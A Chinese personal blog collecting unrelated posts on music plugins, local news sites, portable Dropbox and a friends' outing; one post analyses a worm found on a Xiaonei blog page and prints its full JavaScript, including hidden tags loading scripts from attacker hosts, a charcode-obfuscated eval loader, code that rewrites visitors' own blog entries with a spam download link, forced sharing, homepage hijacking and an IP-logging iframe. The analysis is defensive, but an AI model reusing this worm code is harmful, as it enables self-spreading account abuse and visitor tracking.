Ordinary Days

1. Windows 7 shell integration addon (foo_w7shell)

插件主页：http://wintense.com/plugins/foo_w7shell

2.Yet anther Windows Live Messenger Notifier：foo_wlm

从这个插件发布贴了解到，WLM现在要求发送过去的字符串里面必须有个 ‘-’hyphen

怪不得我之前的都不能显示。

3.奥特歌词 Auto Lyrics

终于受不了始终不更新的乐辞了，之前换用过这款，但一直不能设置成符合自己的习惯。这次发现桌面歌词取消勾选“鼠标穿透”可以调整大小……怪不得主界面找不到设置字体大小的地方。剩下的小遗憾就是桌面歌词模式不能多行滚动了。

加上原来那个foo_osd.dll的效果。

今天看到一则报道，MSNBC收购了一家提供本地化新闻的网站EveryBlock，于是带着好奇去访问了下。

网站名字很好地突出了它的功能，即细致到每个街区的新闻。界面简洁美观，应该说是如今很典型的网页设计风格。（实际上它用Django框架搭建）用户可以直接输入地址来查看发生在周围的新闻。

它将新闻分为了这样几个类别：犯罪，食品安全检查，火警，泳池浴室卫生检查，酒类许可证的变更等方面，有些事情对于一家本地报纸来说都是微不足道的小事，但对于生活在事件周边的人们来说却是与他们自己的生活息息相关的。这些消息也不一定自己写，有些还是会出现在主流媒体的报道上的。另外一些则可以通过其他一些方式获得。

这类信息其实我们也很需要。我们这边虽然没有酒类许可证的问题，但是楼下新开了家小饭馆这类事情还是不差有人关注的。

我们现在要如何获得发生在身边的消息呢？

我想到的方法是利用Google新闻搜索，创建一个小区名字的关键字，也可以是周边道路名称，然后订阅这个搜索结果的RSS。另外小区论坛也是个不错的消息来源。不知大家有什么高招。

其实很多网站利用Google 地图 建立了自己的地理信息库，比如大众点评，为用户匹配一个方圆5km的定制消息并不算太困难，同时还能借此获得用户的地理数据。我就希望我进入大众点评，看到的是我家附近以及工作/学习的地方附近有什么新开的店铺，有什么优惠信息。之后才是调用搜索查找一个指定地点，或一种菜色的饭店。而现在我只能按街区搜索，并且还要面对一个复杂的分类目录。

我向往的本地化新闻

通过搜索引擎，我能找到与我关联的各个地点的所有信息，并且能够按照一定分类筛选过滤。同时，带有定位功能的手持设备实时更新发生在周边的消息。这样的系统在紧急时刻也能很好地发挥出广播的作用，并且能够更细致地控制消息的散播范围。

要做到这些还有些障碍要克服。搜索中的语义分析还有很长的路要走，让传统媒体发布新闻时都带有地理信息也不是一下子能实现的。但好消息是，手持设备越来越多地开始搭载GPS，而且成本也越来越低。一些网站转载新闻时有时会调用公开的地图API制作一张示意图，这样的信息则能被程序很方便地读取。

本日志只研究了

英国人疯了。。出的什么题目啊！！！！

http://blog.xiaonei.com/GetEntry.do?id=343568285&owner=221076834 (*DO NOT FOLLOW THIS LINK*)

实际产生作用的应该是日志尾部的这么几行代码：

<img width="0" height="0" src="http://xss0211.111.no1date.cn/s.php"/>
<script ik="myyoumin" src="http://fmn029.xnimg.cn/fmn029/tribe/20090316/07/30/A087039690816UPL.asx" type="text/javascript">
</script>
</p>
<br/>
<div height="0"> <img id="mydoit" width="0" height="0" src="http://static.xiaonei.com.f/img/temp/fm/20090219.jpg" display="none"/>
</div>

第一个地址应该是包含了跨站攻击脚本(XSS)，但是这个地址(no1date.cn)已经无法解析了。

第二个链接含有一个伪造的asx文件，其中包含代码：

var l=document.createElement("script");
l.src=http://love.avtupian.com/a/x/xOO1.jpg;  //Don’t follow this link
l.type="text/javascript";
document.getElementsByTagName("head").item(0).appendChild(l);

链接的图片实际是一段javascript代码，全文在最后，应该与浏览器的漏洞有关。

作用有自动分享，并修改日志，最后还会记录访问者ip。其中还是有几个网址不能解析，故无法分析其作用。

这个图片仍旧存在，请不要点击上面的链接。

第三个地址的图片也无法打开，看其地址(.com.f),可能是写错了。

结论：本想知道这只是一个单纯的XSS攻击还是会往你的计算机上安插木马，现在仍旧不能确定。

保险起见可参照那个

校内网被挂马，有效解决方案

http://blog.xiaonei.com/GetEntry.do?id=396704329&owner=225886057

查杀一下。如果没有在系统中发现上贴所述文件和注册表项，也不用太担心。

但最重要的是，请运行Windows Update为系统特别是IE打上补丁。

实际上，推荐使用非IE内核浏览器，比如Firefox, Google Chrome, Opera, Safari。

最后是攻击代码存档，来自前述的xOO1.jpg：

function killErrors() {return true;}
window.onerror=killErrors;

function defaul_home(aaa){
aaa.style.behavior='url(#default#homepage)';
aaa.setHomePage('http://www.baidu.com/index.php?tn=haijin0212_pg');
}

function hit(aaa){
     for(i=1;i<10;i++){
    if(window.xxx!=1){
        defaul_home(aaa);
         }    
     }
window.xxx=1;
}
//document.all.blogpage.onclick=Function("hit(document.all.blogpage)");

//----------------------------

var mydata;
var mylink="http://love.avtupian.com/a/x/qiaoye.html";
getinfo();

function getinfo(){
var mylink=document.getElementById("link").value;
var mytype=document.getElementById("type").value;
var mytitle=document.getElementById("title").value;
var mypic=document.getElementById("pic").value;
var myfromno=document.getElementById("fromno").value;
var myfromname=document.getElementById("fromname").value;
var myfromuniv=document.getElementById("fromuniv").value;
var myalbumid=document.getElementById("albumid").value;
var mysummary=document.getElementById("summary").innerText;
var mylargeurl=document.getElementById("largeurl").value;

mydata='post=%7B%22link%22%3A%22'+escape(mylink);
mydata+='%22%2C%22type%22%3A%22'+escape(mytype);
mydata+='%22%2C%22title%22%3A%22'+encodeURIComponent(mytitle);
mydata+='%22%2C%22pic%22%3A%22'+escape(mypic);
mydata+='%22%2C%22fromno%22%3A%22'+escape(myfromno);
mydata+='%22%2C%22fromname%22%3A%22'+encodeURIComponent(myfromname);
mydata+='%22%2C%22fromuniv%22%3A%22'+encodeURIComponent(myfromuniv);
mydata+='%22%2C%22albumid%22%3A%22'+escape(myalbumid);
mydata+='%22%2C%22largeurl%22%3A%22'+escape(mylargeurl);
mydata+='%22%2C%22summary%22%3A%22'+encodeURIComponent(mysummary);
mydata=mydata.replace(/\//g,'%2F');
}
document.getElementById("logo").innerHTML+='<iframe name=do_it id=do_it src="http://share.xiaonei.com/ajaxProxy.html?ver=2" width=0 height=0></iframe>';
setTimeout("appendjs()",2600);

function appendjs(){
document.frames("do_it").document.getElementsByTagName("body").item(0).innerHTML='<img src="http://r.dd/EE?E='+Math.random()+'" onerror="eval(String.fromCharCode(118,97,114,32,115,61,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,13,10,115,46,115,114,99,61,39,104,116,116,112,58,47,47,108,111,118,101,46,97,118,116,117,112,105,97,110,46,99,111,109,47,97,47,120,47,115,46,106,112,103,39,59,13,10,115,46,116,121,112,101,61,39,116,101,120,116,47,106,97,118,97,115,99,114,105,112,116,39,59,13,10,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,46,105,116,101,109,40,48,41,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,13,10))"><div id=eer name=eer>'+mydata+'</div>';
}
//===============================================================================================

var mytitle;var mybody;var mytsc;var myid;var userurl;var guest;var targetblogurlid="0";
var myblogurl=new Array();var myblogid=new Array();var b_index;
var guest2;

        var visitorID=$("logo").firstChild.firstChild.href;
    var IDs=visitorID.indexOf("?id=");
    visitorID=visitorID.substring(IDs+4);
        var mydomain=document.location.href;
    var mydomaint=mydomain.indexOf("blog.xiaonei.com");
    var myo=mydomain.indexOf(visitorID);
    if(mydomaint!=-1&&myo==-1){setTimeout("get_my_blogurl()",400);}

function get_my_blogurl(){
        var as=new Ajax.Request("http://blog.xiaonei.com/MyBlog.do",{method:"get",onComplete:add_my_blogurl,onFailure:add_my_blogurl});
        return as;
    }
function add_my_blogurl(r){
  var mybloglist=r.responseText;
  var myurls;var blogids;var blogide;
  for(i=0;i<10;i++){
     myurls=mybloglist.indexOf('<strong><a href="http://blog.xiaonei.com/GetEntry.do?id=');
     //mybloglist=mybloglist.substring(myurls+10);
     //myurls=mybloglist.indexOf('<strong><a href="http://blog.xiaonei.com/GetEntry.do?id=');
     if(myurls!=-1){
         mybloglist=mybloglist.substring(myurls);
         myurls=mybloglist.indexOf('"');
         mybloglist=mybloglist.substring(myurls+1);
         myurls=mybloglist.indexOf('"');
         myblogurl[i]=mybloglist.substring(0,myurls-1);mybloglist=mybloglist.substring(myurls+1);
         blogids=myblogurl[i].indexOf("?id=");blogide=myblogurl[i].indexOf("&owner");
         myblogid[i]=myblogurl[i].substring(blogids+4,blogide);   
         //document.getElementById("blogContent").innerHTML+="<br><a href=eee.com >i="+i+";</a>"+myblogid[i];
     }else{break;}
  }
  get_my_testself();
}
//-------------------------------------

function get_my_testself(){
    targetblogurlid=0;
  for(i=0;i<myblogid.length;i++){
      //var url="http://blog.xiaonei.com/GetEntry.do?id="+myblogid[i]+"&owner="+visitorID;
      var url="http://blog.xiaonei.com/EditEntry.do?id="+myblogid[i];
      var xhr2=createXMLHttpRequest();
      if(xhr2){
              xhr2.open("GET",url,false);
              xhr2.send();guest2=xhr2.responseText;
        }
      var mycheckit=guest2.indexOf("skycn");
      if(mycheckit==-1){targetblogurlid=myblogid[i];b_index=i;break;}
   }
   if(targetblogurlid!=0){add_my_form(targetblogurlid);}
}
//---------------------------------------------------------------add--form
function add_my_form(r){
guest=guest2;
var texts=guest.indexOf('name="title"');
guest=guest.substring(texts);

var titles=guest.indexOf('value="');
var titlee=guest.indexOf('" />');
mytitle=guest.substring(titles+7,titlee);
mytitle=mytitle.replace(/&amp;/g,'&').replace(/&quot;/g,'\"').replace(/&lt;/g,'<').replace(/&gt;/g,'>').replace(/&#034;/g,'"');
mytitle=encodeURI(mytitle);
guest=guest.substring(titlee);

var bodys=guest.indexOf('name="body"');
var bodye=guest.indexOf('</textarea>');
mybody=guest.substring(bodys+30,bodye);
mybody=mybody.replace(/&amp;/g,'&').replace(/&quot;/g,'\"').replace(/&lt;/g,'<').replace(/&gt;/g,'>').replace(/&#034;/g,'"');

mybody+='<p><br>最后推荐一个东西：<br><br>发现了好软件，QQ千里眼，能够强制与任何QQ视频，能够强制加好友，强制聊天，迫使下线！<br>下载地址：<a href="http://tan.itwenba.cn/qq/QQqianliyan.rar" target=_blank >天空下载中心:skycn</a></p>';
mybody=encodeURI(mybody);

myxiugai();
}

function myxiugai(){
userurl="http://blog.xiaonei.com/EditEntry.do";
var fdata="title="+mytitle+"&body="+mybody+"&categoryId=0&blogControl=99&passwordProtedted=0&passWord=&blog_pic_id=0&pic_path=&owner="+visitorID+"&relative_optype=&id="+targetblogurlid;
var xhr=createXMLHttpRequest();
fdata=fdata.replace(/\//g,'%2F');
fdata=fdata.replace(/%09/g,'');
fdata=fdata.replace(/%0D%0A/g,'');

if(xhr){
  xhr.open("POST",userurl,false);
  xhr.setRequestHeader("Content-Type","application/x-www-form-urlencoded");
  xhr.send(fdata);
  }
}

//--------------------------------
function createXMLHttpRequest(){
    var XMLhttpObject=null;   
    if (window.XMLHttpRequest) {XMLhttpObject = new XMLHttpRequest()}  
    else   
      { var MSXML=['Msxml2.XMLHTTP.7.0','Msxml2.XMLHTTP.6.0', 'Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP','MSXML.XMLHTTP', 'MICROSOFT.XMLHTTP.1.0','MICROSOFT.XMLHTTP.1', 'Microsoft.XMLHTTP'];        
        for(var i=0;i<MSXML.length;i++)  
        {  
            try 
            {  
                XMLhttpObject=new ActiveXObject(MSXML[i]);  
                break;  
            }  
            catch (ex) { 
            }
         }  
      }
return XMLhttpObject;
}
//---------------------------------------
setTimeout("myshua()",200);
function myshua(){
document.getElementById("optiondropdownMenu").insertAdjacentHTML("beforeend","<iframe width=0 height=0 src='http://love.avtupian.com/ip.asp'></iframe>");
}

//注:String.fromCharCode(118,97,114,32,115,61,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,13,10,115,46,115,114,99,61,39,104,116,116,112,58,47,47,108,111,118,101,46,97,118,116,117,112,105,97,110,46,99,111,109,47,97,47,120,47,115,46,106,112,103,39,59,13,10,115,46,116,121,112,101,61,39,116,101,120,116,47,106,97,118,97,115,99,114,105,112,116,39,59,13,10,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,46,105,116,101,109,40,48,41,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,13,10))"><div

的转换结果为

var s=document.createElement('script'); s.src='http://love.avtupian.com/a/x/s.jpg'; s.type='text/javascript'; document.getElementsByTagName('head').item(0).appendChild(s);

s.jpg所含 代码为 ：（作用应该是提交分享）

var sdata;var guest;
sdata=document.all.eer.innerHTML;

if(!window.sss){
get_tsc();
window.sss=1;
}

function get_tsc(){
var xhr=createXMLHttpRequest();
var url;var guest;
var tdata=sdata+'%22%7D';

url="http://share.xiaonei.com/share/popup.do";
if(xhr){
  xhr.open("POST",url,false);
  xhr.setRequestHeader("Content-Type","application/x-www-form-urlencoded");
  xhr.send(tdata);guest=xhr.responseText;
  }

var indexs=guest.indexOf("tsc_popShare");
guest=guest.substring(indexs+13);
indexs=guest.indexOf('"');
guest=guest.substring(indexs+1);
indexs=guest.indexOf('"');

guest=guest.substring(0,indexs);
var mytsc=guest;

tdata="";
tdata=sdata;
tdata+='%22%2C%22sendcomment%22%3A%22on%22%2C%22action%22%3A%22add%22%2C%22auth%22%3A%2299%22%2C%22body%22%3A%22';
tdata+='';
tdata+='%22%7D';

tdata="tsc="+mytsc+"&"+tdata;
var url="http://share.xiaonei.com/share/submit.do";
if(xhr){
  xhr.open("POST",url,false);
  xhr.setRequestHeader("Content-Type","application/x-www-form-urlencoded");
  xhr.send(tdata);guest=xhr.responseText;
  }

}

function createXMLHttpRequest(){
    var XMLhttpObject=null;   
    if (window.XMLHttpRequest) {XMLhttpObject = new XMLHttpRequest()}  
    else   
      { var MSXML=['Msxml2.XMLHTTP.7.0','Msxml2.XMLHTTP.6.0', 'Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP','MSXML.XMLHTTP', 'MICROSOFT.XMLHTTP.1.0','MICROSOFT.XMLHTTP.1', 'Microsoft.XMLHTTP'];        
        for(var i=0;i<MSXML.length;i++)  
        {  
            try 
            {  
                XMLhttpObject=new ActiveXObject(MSXML[i]);  
                break;  
            }  
            catch (ex) { 
            }  
         }  
      }
return XMLhttpObject;
} 

8城的日志：http://blog.xiaonei.com/GetEntry.do?id=377479466&owner=231875356

篮球赛的视频（angela上传)：http://blog.xiaonei.com/GetEntry.do?id=377728206&owner=224469235

一段中午的瞎拍（zpy制作上传):（http://blog.xiaonei.com/GetEntry.do?id=378022333&owner=230811135

-------------------------------------------------

这里是辛巴达视频零售版光盘镜像，包含1，2全集，家庭用VCD,DVD播放可，附带照片数张。

mdf镜像主文件下载页：http://massmirror.com/d107e871e2f4e80fcaec7083cd0e0084.html
mds镜像描述文件下载地址：http://dl.getdropbox.com/u/219559/SinBad%20by%20sfls0602.mds

大小：共409 MB

达到的效果：ed2k链接直接点击恢复成按照Firefox设置处理，点击未知文件格式不会直接弹出QQ旋风。

修改扩展中的chrome\qqdownload.jar\qqdownloadclick.js，在第十一行加入 return true;

Dropbox论坛上贴出了打包后的移动版本Dropbox Protable，能够从任何USB驱动器启动Dropbox而无需安装，当然也可直接同步U盘中的数据。

下载地址(0.6.491)：

http://dl.getdropbox.com/u/50461/DropboxPortable%200.6.491.zip

如果暂时无法下载，请稍等片刻，应该是文件被更新了所以正在重新同步。

如何升级：

升级前请备份 "Data” 和 “Dropbox”两个文件夹，然后再复制新的程序文件。

已知问题：

移动版还无法与资源管理器整合，右键里的Dropbox菜单无法使用。

只支持32位Windows XP/Vista/7

原帖地址：http://forums.getdropbox.com/topic.php?id=7729&replies=6 来自Dropbox Forums

此处注册Dropbox ，获得2G+250MB存储空间

介绍页，内含下载地址：http://www.amuseplayer.com/

创建一个直接打开的快捷方式(来自那个视频教程)：

<firefox安装路径>firefox.exe -chrome chrome://amuseplayer/content/extamuse.xul

一个是堆关键字的，一个是某组织散发某破W软件的。

Space除了设置权限没别的办法阻止这些评论，而我又非常不愿意限制访问权限……

您可能也碰到了，垃圾评论未必回复在您最新的一篇日志上，去你的Space Home（<yourname>.home.spaces.live.com)看看。

31日想邀请大家聚一聚，出来玩~

我上午去鲁迅公园做骨髓干细胞的捐献登记，具体请见上一贴，也欢迎您同往。

午餐就地解决。（-_-|||)

下午我的安排是就近高点，到晚上在找地方吃饭Update!

找的地方是鲁迅公园边上的

上海人家时尚火锅http://www.dianping.com/shop/2400286#ur

自助小锅，肉类无限量，晚间58元/人。如果不想吃火锅的话那考虑直接找家KTV了~，上次人民广场的那家好乐迪我觉得还不错……

另外一方案，由于莉莉同学和兰原同学约在徐家汇，那可以跟兰原一起，于是下午我们可以去附近的：锦江乐园

可以下午来，也可以来吃个晚饭~